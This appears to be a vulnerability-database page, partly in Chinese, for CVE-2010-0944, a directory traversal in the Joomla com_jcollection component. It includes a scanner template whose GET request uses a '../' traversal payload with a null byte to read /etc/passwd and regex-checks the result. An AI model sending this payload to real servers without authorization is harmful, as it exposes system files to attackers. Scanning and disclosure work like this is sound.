CVE-2010-0944: Joomla! Component com_jcollection - Directory Traversal

日期: 2025-08-01 | 影响软件: Joomla! Component | POC: 已公开

漏洞描述

A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

PoC代码[已公开]

id: CVE-2010-0944

info:
  name: Joomla! Component com_jcollection - Directory Traversal
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/11088
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0944
    - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
    - http://www.exploit-db.com/exploits/11088
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-0944
    cwe-id: CWE-22
    epss-score: 0.00912
    epss-percentile: 0.7505
    cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: thorsten_riess
    product: com_jcollection
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220580a24cbe0265347d4810f7a76015768e5d9863765de256ed222cd031f4c3a9a022100d28905e40d58ce0283f9205849406eb4fa875a19f4770be20904a8a51c32a23c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐